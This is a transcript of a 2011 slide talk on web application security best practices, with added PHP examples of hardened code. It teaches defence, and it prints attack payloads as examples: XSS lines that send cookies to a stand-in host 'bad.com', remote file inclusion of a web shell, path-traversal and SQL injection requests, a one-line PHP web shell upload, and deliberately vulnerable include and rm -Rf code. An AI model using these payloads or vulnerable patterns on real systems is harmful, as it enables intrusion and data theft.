BEST PRACTICES OF WEB APPLICATION SECURITY

Presentation Transcript

WEB APPLICATION SECURITY: 

WEB APPLICATION SECURITY BEST PRACTICES OF 2011

OVERVIEW: 

OVERVIEW Web Application Security is a vast topic, and there is not enough time to cover every kind of malicious attack and the techniques for avoiding them, so we will focus on the top 10 high level vulnerabilities. Web developers work in different ways, using their own custom libraries and intrusion prevention systems; here we will see what they should and should not do, based on best practices.

CONTENT: 

CONTENT
Introduction & Statistics
    Statistics of vulnerabilities
    High level vulnerabilities
TOP 10 HIGH LEVEL VULNERABILITIES
    Cross-Site Scripting
    Information Leakage
    SQL Injection
    Local/Remote File Inclusion
    Unrestricted uploads
    Shell Injections

STATISTICS OF VULNERABILITIES: 

STATISTICS OF VULNERABILITIES Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html

STATISTICS OF RISK LEVELS: 

STATISTICS OF RISK LEVELS Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html

OWASP TOP 10: 

OWASP TOP 10 https://www.owasp.org/index.php/Top_10_2010-Main

HIGH LEVEL VULNERABILITIES: 

HIGH LEVEL VULNERABILITIES
01. Cross-Site Scripting (XSS)
02. Information leakage
03. SQL Injection
04. Local/Remote File Inclusion
05. Unrestricted File Upload
06. Shell injection

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING DESCRIPTION: Cross-Site Scripting is a type of web application vulnerability in which an attacker injects executable code (JavaScript, HTML, etc.) into a vulnerable webpage. EXAMPLE: http://site.com/search.php?q=<script>alert("XSS")</script>

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING TYPES: Non-Persistent, Persistent. 1. Non-Persistent: In this type of XSS vulnerability an attacker is able to execute his own code in a webpage, but nothing is changed or stored on the website itself.

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING Non-Persistent EXAMPLE:
http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script>
OR
http://www.site.com/viewtopic.php?id=4"><script>document.write("<img src='http://bad.com/logger.php?cookie="+document.cookie+"'/>");</script>

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING 2. Persistent: In this case the attacker stores his executable script in the vulnerable website's database, and it is executed every time the webpage displays that data. Common targets are: comments, chat messages, e-mail messages, wall posts, etc.

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING Persistent EXAMPLE: http://www.youtube.com/watch?v=ys6pUis-Wfw

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING Persistent Comment in raw format: and I like the way this website developers work..hahaha :D :D <SCRIPT/XSS SRC="http://bad.com/xss.js"> </SCRIPT>

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING Potentially Dangerous HTML elements:
TAGS: <applet> <body> <embed> <frame> <script> <frameset> <html> <iframe> <img> <style> <layer> <ilayer> <meta> <object>, etc.
ATTRIBUTES: src, href, lowsrc, xmlns, style, etc.

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING Potentially Dangerous HTML events: onblur, onchange, onclick, ondrag, onerror, onfocus, onkeypress, onkeyup, onload, onmouseover, onmousemove, onmove, onresize, onselectstart, onselect, onsubmit, onunload, onscroll, etc. (* all HTML events)

CROSS-SITE SCRIPTING: 

CROSS-SITE SCRIPTING SOLUTIONS:
Input sanitization: PHP function strip_tags(); PHP Input Filter; PHP libraries: HTML_Safe, htmLawed, kses, Safe HTML Checker, etc.
Output sanitization: PHP function htmlentities()
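Added example (not from the slides): the search.php page from the XSS slide written once vulnerable and once with output sanitization, next to a case that shows why input sanitization with strip_tags() alone does not stop an attribute-context injection. Function names are ours.

```php
<?php
// Added example (not from the slides): search.php from the XSS slide, once
// vulnerable and once with output sanitization via htmlspecialchars(), plus a
// case that shows why input sanitization with strip_tags() alone is not
// enough. Function names are ours.
declare(strict_types=1);

// Vulnerable: the raw query string is written straight into the page.
function render_search_vulnerable(string $q): string
{
    return '<input name="q" value="' . $q . '"> You searched for: ' . $q;
}

// strip_tags() removes <script>, but a payload that needs no tag survives it.
function render_search_strip_tags_only(string $q): string
{
    $q = strip_tags($q);
    return '<input name="q" value="' . $q . '"> You searched for: ' . $q;
}

// Hardened: the value is HTML-encoded where it is output. ENT_QUOTES also
// encodes ' and ", so the attribute cannot be closed early; ENT_SUBSTITUTE
// keeps invalid UTF-8 from turning the whole string into "".
function render_search_safe(string $q): string
{
    $enc = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="q" value="' . $enc . '"> You searched for: ' . $enc;
}

// Constructed inputs: the slide's <script> payload, and one with no tag at
// all that only closes the attribute and adds an event handler from the
// "dangerous HTML events" slide.
$inputs = [
    '<script>alert("XSS")</script>',
    '" onfocus="alert(1)" autofocus="',
];
foreach ($inputs as $q) {
    echo "vulnerable : ", render_search_vulnerable($q), "\n";
    echo "strip_tags : ", render_search_strip_tags_only($q), "\n";
    echo "encoded    : ", render_search_safe($q), "\n\n";
}
```

Only the encoded output keeps both inputs inside the attribute value; the second input passes strip_tags() untouched because it contains no tag.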

BEST SOLUTION: 

BEST SOLUTION OWASP HTML Purifier
SAFE: HTML Purifier defeats XSS with an audited whitelist
CLEAN: HTML Purifier ensures standards-compliant output
OPEN: HTML Purifier is open-source and highly customizable

BEST SOLUTION: 

BEST SOLUTION COMPARISON: Source: www.htmlpurifier.org/comparison

INFORMATION LEAKAGE: 

INFORMATION LEAKAGE DESCRIPTION: Information Leakage is an application weakness in which an application reveals sensitive data, such as technical details of the web application or its environment, or user-specific data. EXAMPLE: sosasta.com

INFORMATION LEAKAGE: 

INFORMATION LEAKAGE CAUSES: directory listing misconfiguration, improper error handling, improper filetype handling, sensitive HTML comments, etc.
1. Directory listing misconfiguration: Leaving directory listing enabled allows the attacker to read the list of all files in a directory.

INFORMATION LEAKAGE: 

INFORMATION LEAKAGE EXAMPLE (directory listing misconfiguration): http://www.site.com/admin/

INFORMATION LEAKAGE: 

INFORMATION LEAKAGE 2. Improper error handling: Because of improper error handling, every unexpected request generates an error message that is visible to the attacker. EXAMPLE: Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/aes/public_html/news/list.php on line 81

INFORMATION LEAKAGE: 

INFORMATION LEAKAGE 3. Improper filetype handling: Improper filetype handling allows your important files to be read by the attacker. EXAMPLE: sql_backup.tar.gz, memberlist.xml, phpinfo.html, dbClass.inc, Login.php.bkp

INFORMATION LEAKAGE: 

INFORMATION LEAKAGE EXAMPLE (improper filetype handling): dbClass.inc
…
private $host = "localhost";
private $usr = "root";
private $pwd = "i7kT0w";
public $db = "brav_new";
public function Connect(){ … }
…

INFORMATION LEAKAGE: 

INFORMATION LEAKAGE 4. Sensitive HTML comments: Notes left by web developers may contain important information, which causes information leakage. EXAMPLE:
<form enctype="multipart/form-data" action="upload.php" method="POST">
<!--check for filetypes php, cgi, pl, bat, exe, dll, reg-->
<input name="upload_file" type="file" />
…

BEST SOLUTION: 

BEST SOLUTION Directory listing misconfiguration: Put a blank file named index.html in that directory, or put a file named .htaccess in that directory consisting of only this line:
Options -Indexes
NOTE: all sub-directories of that directory will also get their directory listings turned off.

BEST SOLUTION: 

BEST SOLUTION Improper error handling: The following settings should be made in the php.ini file:
error_reporting = E_ALL
display_errors = Off
log_errors = On
error_log = path/PHP_errors.log   ; any file to which the web server has write privileges

BEST SOLUTION: 

BEST SOLUTION Improper error handling: Create an .htaccess file in the public_html directory with the following lines:
php_flag display_errors off
php_flag log_errors on
php_value error_log path/PHP_errors.log
<Files path/PHP_errors.log>
Order allow,deny
Deny from all
Satisfy All
</Files>

BEST SOLUTION: 

BEST SOLUTION Improper filetype handling: Don't keep your important files with the following extensions in your public web directory if you don't link to them from the website: Compressed files (*.zip, *.rar, *.tar.gz, etc.); Database files (*.sql, *.csv, *.xml, *.xls, etc.); Unknown files (*.inc, *.copy, *.bkp, etc.)

BEST SOLUTION: 

BEST SOLUTION Improper filetype handling: If you have a reason to keep those files in your public web directory, create an .htaccess file in that directory with the following lines:
<Files ~ "\.(inc|sql)$">
order allow,deny
deny from all
</Files>

BEST SOLUTION: 

BEST SOLUTION Sensitive HTML comments: No sensitive HTML comment must be used in a website, as every user is able to view the webpage source code.

SQL INJECTION: 

SQL INJECTION DESCRIPTION: This is a type of vulnerability in which the attacker injects his custom SQL query into the request to get sensitive data from the database, or to read or write a file. EXAMPLE: http://site.com/product.php?id=4+AND+1=2+UNION+SELECT+0,database(),1,2+--

SQL INJECTION: 

SQL INJECTION TYPES: Normal, Blind. 1. Normal: In this type of SQL Injection vulnerability the attacker sends a custom SQL query and gets the output on the screen.

SQL INJECTION: 

SQL INJECTION EXAMPLE (normal SQL Injection): http://site.com/product.php?id=1348+AND+1=2+union+select+1,2,user(),database(),5,version(),7+--

SQL INJECTION: 

SQL INJECTION 2. Blind: This type of injection is identical to normal SQL Injection except that the query output is not displayed; the page only gives a positive or negative response to the injected condition. EXAMPLE: http://site.com/view.php?page=10+and+substring(@@version,1,1)=5+--

SQL INJECTION: 

SQL INJECTION SOLUTIONS:
php.ini configuration: magic_quotes_gpc = on
PHP functions: filter_var(), mysql_real_escape_string(), sprintf()
Put variables into quotes (e.g. '$id')
Assign minimum privileges to MySQL users
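Added example (not from the slides): the product.php page from the SQL injection slides rewritten with a parameterised query. Prepared statements are not on the slide's solution list; they are used here in place of escaping and sprintf(), with the slide's filter_var() kept as the type check. The table and column names, DSN, user name and password are assumed placeholders.

```php
<?php
// Added example (not from the slides): product.php from the SQL injection
// slides rewritten with a parameterised query. Prepared statements are not on
// the slide's solution list; here they replace escaping and sprintf(), with
// the slide's filter_var() kept as the type check. Table, column names, DSN
// and credentials are assumed placeholders.
declare(strict_types=1);

// Vulnerable: the id becomes part of the SQL text, so
// ?id=4+AND+1=2+UNION+SELECT+... is parsed as SQL.
function product_sql_vulnerable(string $id): string
{
    return "SELECT id, name, price FROM products WHERE id = " . $id;
}

// Hardened: validate the type, then bind the value as a parameter. The value
// is sent to MySQL separately from the statement text, so whatever it
// contains it can only ever be compared against the id column.
function get_product(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                       // not a positive integer: refuse
    }
    $stmt = $db->prepare('SELECT id, name, price FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// shop_ro is assumed to be a MySQL user granted only SELECT on shop.products
// (the slide's "minimum privileges" point), e.g.
//   GRANT SELECT ON shop.products TO 'shop_ro'@'localhost';
// Emulated prepares are turned off so MySQL itself performs the binding.
$db = new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', 'shop_ro', 'PLACEHOLDER', [
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);

$payload = '4 AND 1=2 UNION SELECT 0,database(),1';
echo product_sql_vulnerable($payload), "\n";  // the injected query the slide shows
var_dump(get_product($db, $payload));        // NULL: rejected by filter_var()
var_dump(get_product($db, '4'));             // the product row, or NULL if absent
```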

BEST SOLUTION: 

BEST SOLUTION GreenSQL open source database firewall: Activity monitoring and audit; User rights management; Real-time database protection; Intrusion prevention (IPS); Database caching; Encrypted communication over SSL; Virtual patching; Reporting

BEST SOLUTION: 

BEST SOLUTION GreenSQL open source database firewall Source: www.greensql.net

FILE INCLUSION: 

FILE INCLUSION DESCRIPTION: This type of web application vulnerability allows an attacker to include a local or remote file into the vulnerable webpage. EXAMPLE: http://site.com/view.php?file=../../../../../../../../../../../../../../etc/passwd%00

FILE INCLUSION: 

FILE INCLUSION TYPES: Local, Remote. 1. Local File Inclusion: This type of inclusion is used to include local files. It is mostly used for server configuration files, such as system user information, filesystem structure, etc.

FILE INCLUSION: 

FILE INCLUSION EXAMPLE (local file inclusion): http://site.com/include.php?file=../../../../../../../../../../../../../etc/passwd%00
root:*:0:0:Super User:/root:/bin/csh
daemon:*:1:1:Daemon:/nonexistent:/sbin/nologin
operator:*:2:5:Operator:/nonexistent:/sbin/nologin
bin:*:3:7:Binaries:/nonexistent:/sbin/nologin
tty:*:4:65533:tty Sandbox:/nonexistent:/sbin/nologin
kmem:*:5:65533:kmem Sandbox:/nonexistent:/sbin/nologin
games:*:7:13:Games:/nonexistent:/sbin/nologin
news:*:8:8:News Subsystem:/nonexistent:/sbin/nologin
man:*:9:9:Man Pages:/nonexistent:/sbin/nologin
ftp:*:14:5:Anonymous FTP Admin:/usr/ftp:/nonexistent

FILE INCLUSION: 

FILE INCLUSION 2. Remote File Inclusion: Unlike local file inclusion, this is used to include remote scripts such as web shells, which is more dangerous than the previous one. Main goals: remote code execution; remote rootkit installation and complete system compromise; etc.

FILE INCLUSION: 

FILE INCLUSION EXAMPLE (remote file inclusion): http://site.com/include.php?file=http://bad.com/c99_shell.php&act=ls&dir=%2Fvar

FILE INCLUSION: 

FILE INCLUSION VULNERABLE PHP CODES
<?php include($_GET['file']); ?>
<?php include($_GET['file'].".htm"); ?>
<?php include("includes/".$_GET['file']); ?>
<?php include("includes/".$_GET['file'].".htm"); ?>
etc.

FILE INCLUSION: 

FILE INCLUSION COMMON EXPLOITS/REQUESTS
?file=../../../../../../../../../etc/passwd
?file=../../../../../../../../../var/lib/locate.db
?file=../../../../../../../../../var/log/apache/error.log
?file=../../../../../../../../../etc/passwd%00
?file=../../../../../../../../../var/www/accounts/%00
?file=http://bad.com/xss.php?xss=phpcode
?file=http://bad.com/shell.txt
?file=data://text/plain;base64,SU5KRUNURUQ=
?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\
etc.

FILE INCLUSION: 

FILE INCLUSION COMMON METHODS OF ATTACK
Hostile data being uploaded to session files, log data, and via image uploads
Using compression or audio streams, such as zlib:// or ogg:// (allow_url_fopen/allow_url_include may be disabled)
Using PHP wrappers, such as php://input
Using PHP's data: wrapper, such as data:;base64,PD9waHAgcGhwaW5mbygpOz8+
etc.

FILE INCLUSION: 

FILE INCLUSION POTENTIALLY DANGEROUS PHP FUNCTIONS: include()/include_once(), require()/require_once(), file_get_contents(), fopen(), file(), copy(), unlink(), upload_tmp_dir(), move_uploaded_file(), imagecreatefromXXX()

BEST SOLUTION: 

BEST SOLUTION
Use whitelisted filenames, or allow only valid file name characters (e.g. /^(((?:\.)(?!\.))|\w)+$/)
Modify the php.ini configuration file:
register_globals = Off
magic_quotes_gpc = On
allow_url_fopen = Off
allow_url_include = Off
Do not use any of the potentially dangerous PHP functions (previous slide) without filtering user input
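Added example (not from the slides): a replacement for the vulnerable include($_GET['file']) patterns shown above, combining the two whitelisting options from this slide with a realpath() containment check. The include directory and page file names are assumed.

```php
<?php
// Added example (not from the slides): a replacement for the vulnerable
// include($_GET['file']) patterns. Two layers: a fixed map from page names to
// files, and, when the name itself must come from the request, the slide's
// character regex plus a realpath() check that the resolved file stays
// inside the include directory. Directory and file names are assumed.
declare(strict_types=1);

const INCLUDE_DIR = __DIR__ . '/includes';

// Layer 1: the request names a key, never a path. Unknown keys are refused.
const PAGES = ['home' => 'home.htm', 'about' => 'about.htm', 'contact' => 'contact.htm'];

function resolve_page(string $name): ?string
{
    return isset(PAGES[$name]) ? INCLUDE_DIR . '/' . PAGES[$name] : null;
}

// Layer 2: only word characters and single dots pass the regex, so "..",
// "/", ":" and a null byte are rejected before any filesystem call.
// realpath() then canonicalises the path (following symlinks) and fails for
// missing files, and the prefix test guarantees the result is under INCLUDE_DIR.
function resolve_filename(string $file): ?string
{
    if (!preg_match('/^(((?:\.)(?!\.))|\w)+$/', $file)) {
        return null;
    }
    $real = realpath(INCLUDE_DIR . '/' . $file . '.htm');
    $base = realpath(INCLUDE_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed requests: a valid key, then the LFI and RFI payloads from the
// slides (the %00 is shown URL-encoded here; PHP would have decoded it).
$requests = ['home', '../../../../etc/passwd%00', 'http://bad.com/shell.txt', 'home..'];
foreach ($requests as $req) {
    $path = resolve_page($req) ?? resolve_filename($req);
    echo str_pad($req, 28), ' => ', $path === null ? 'REJECTED' : "include $path", "\n";
}
```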

UNRESTRICTED FILE UPLOAD: 

UNRESTRICTED FILE UPLOAD DESCRIPTION: This vulnerability of a web application allows an attacker to upload malicious files to the server. Most of the time those files are web shell scripts used to take control of your web server. EXAMPLE (any file is accepted and stored under its original name):
$usrFile = $_FILES['userfile']['name'];
$uploadFolder = "uploads/";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadFolder . $usrFile)) {
    echo "File has been successfully uploaded.";
} else {
    echo "Error. Please try again!";
}

UNRESTRICTED FILE UPLOAD: 

UNRESTRICTED FILE UPLOAD EXAMPLE:
POST /upload1.php HTTP/1.1
…
Content-Type: multipart/form-data; boundary=xYzZY

--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: text/plain

<?php system($_GET['command']); ?>
--xYzZY--

HTTP/1.1 200 OK
…
File has been successfully uploaded.

UNRESTRICTED FILE UPLOAD: 

UNRESTRICTED FILE UPLOAD COMMON MISTAKES:
Using a blacklist for file extensions: checking only for *.php, *.cgi, ..., *.exe, etc. extensions
Checking only the MIME type: checking only the content of $_FILES['file']['type']
Improper check of double extensions: improperly checking for files such as *.php.jpg, *.php.xyz, *.asp.1234, etc.
Checking only the image header: relying only on PHP functions such as getimagesize()
Checking filetype in filename: checking the content of the filename after the last dot (.)
etc.

BEST SOLUTION: 

BEST SOLUTION Define an .htaccess file that will only allow access to files with allowed extensions. This will also prevent double extension attacks.
deny from all
<Files ~ "^\w+\.(gif|jpe?g|png)$">
order deny,allow
allow from all
</Files>

BEST SOLUTION: 

BEST SOLUTION
Prevent overwriting of existing files (to prevent the .htaccess overwrite attack).
Create a list of accepted mime-types (map extensions from those mime types).
Generate a random file name and add the previously generated extension.
Don't rely on client-side validation only, since it is not enough. Ideally one should have both server-side and client-side validation implemented.
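Added example (not from the slides): the upload handler from the UNRESTRICTED FILE UPLOAD slide rewritten to follow the points above, with the MIME type detected from the file content, the extension taken from an allowlist keyed by MIME type, a random file name and no overwriting. The upload directory and size limit are assumed.

```php
<?php
// Added example (not from the slides): the upload handler from the
// UNRESTRICTED FILE UPLOAD slide rewritten to follow the BEST SOLUTION
// points: MIME type sniffed from the content, extension taken from an
// allowlist keyed by MIME type, random file name, no overwrite. Assumed names.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads';   // covered by the .htaccess above
const MAX_BYTES  = 2 * 1024 * 1024;

// Accepted MIME types and the extension each is stored with. The client's
// file name and $_FILES['userfile']['type'] are never consulted.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Returns the stored file name, or throws with a message that is safe to show.
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed.');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file.');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large.');
    }
    // Sniff the MIME type from the bytes, not from the name or the header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('File type not allowed.');
    }
    // Random name + allowlisted extension: "shell.php.jpg" is stored as
    // <hex>.jpg, and a client name of ".htaccess" never reaches the disk.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (file_exists($dest) || !move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not save file.');   // never overwrite
    }
    chmod($dest, 0644);                                       // no execute bit
    return $name;
}

try {
    echo 'Stored as ', store_upload($_FILES['userfile'] ?? []), "\n";
} catch (RuntimeException $e) {
    echo 'Error: ', $e->getMessage(), "\n";
}
```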

SHELL INJECTION: 

SHELL INJECTION DESCRIPTION: Shell Injection is a web application vulnerability which allows an attacker to execute shell commands on the web server. EXAMPLE: http://site.com/manage.php?action=id

SHELL INJECTION: 

SHELL INJECTION EXAMPLE: http://site.com/delete.php?file=/
delete.php:
<?php
$file = $_GET['file'];
echo 'erasing ' . $file . '<br />';
system("rm -Rf $file");
echo 'done';
?>

SHELL INJECTION: 

SHELL INJECTION POTENTIALLY DANGEROUS PHP FUNCTIONS: shell_exec(), exec(), `` (backticks), system(), passthru(), eval(), popen(), curl_exec(), curl_multi_exec(), show_source(), proc_open(), parse_ini_file(), etc.

BEST SOLUTION: 

BEST SOLUTION
Disable all the potentially dangerous PHP functions: in the php.ini configuration file, disable all the potentially dangerous PHP functions which you don't use: disable_functions = system,exec,etc.
Allow only whitelisted commands to be used: you may have a list of non-dangerous commands which will be allowed.
Use PHP built-in functions to escape the user input: use functions such as escapeshellarg() and escapeshellcmd() to escape the user input.
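Added example (not from the slides): delete.php from the SHELL INJECTION slide rewritten two ways, first without any shell call at all, then, for the case where a command is unavoidable, with the whitelist of commands and escapeshellarg() this slide recommends. The data directory and the command map are assumed.

```php
<?php
// Added example (not from the slides): delete.php from the SHELL INJECTION
// slide rewritten two ways. First, no shell at all: unlink() on a path that
// must resolve inside DATA_DIR. Second, where a command is unavoidable, the
// slide's advice: a fixed allowlist of commands plus escapeshellarg().
// Directory and command names are assumed.
declare(strict_types=1);

const DATA_DIR = __DIR__ . '/data';

// 1. The file must resolve to a regular file directly inside DATA_DIR.
function delete_file(string $name): bool
{
    $real = realpath(DATA_DIR . '/' . basename($name));
    $base = realpath(DATA_DIR);
    if ($real === false || $base === false || !is_file($real)
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;            // "/", "../x" and "a;id" all end here
    }
    return unlink($real);
}

// 2. Allowlisted commands only. The user controls one argument, and that
//    argument goes through escapeshellarg(), so the shell receives a single
//    quoted word and never sees operators such as ; | ` or $( ).
const COMMANDS = [
    'disk'   => 'df -h --',
    'whoami' => 'id',
    'info'   => 'file --',
];

function run_command(string $action, string $arg = ''): ?string
{
    if (!isset(COMMANDS[$action])) {
        return null;             // anything not in the map is refused
    }
    $cmd = COMMANDS[$action];
    if ($arg !== '') {
        $cmd .= ' ' . escapeshellarg($arg);
    }
    $out = shell_exec($cmd);
    return is_string($out) ? $out : null;
}

// Constructed requests mirroring the slides' ?file= and ?action= parameters.
var_dump(delete_file('/'));                    // false: nothing is executed
var_dump(run_command('cat', '/etc/passwd'));   // null: "cat" is not allowlisted
echo run_command('info', 'x; id');             // file(1) receives the literal name "x; id"
```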

Self Test : 

Self Test Use web application vulnerability scanning tools before doing a release of the product: Skipfish, Netsparker, NIKTO, N-stalker, Paros, w3af. http://en.wikipedia.org/wiki/Web_application_security_scanner

THANK YOU!!: 

THANK YOU!! rohit@clubhack.com

REFERENCES: 

REFERENCES
http://ptresearch.blogspot.com/2010/06/web-application-vulnerability.html
http://en.wikipedia.org/
http://owasp.org
http://knol.google.com/k/a-short-history-of-cross-site-scripting-viruses-worms
http://projects.webappsec.org/w/page/13246936/Information-Leakage
http://phpsec.org/projects/guide/1.html
http://en.wikipedia.org/wiki/SQL_injection
http://www.darkreading.com/database-security/167901020/security/application-security/227300073/index.html
http://websec.wordpress.com/category/sqli/
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.madirish.net/?article=427
http://www.acunetix.com/websitesecurity/upload-forms-threat.htm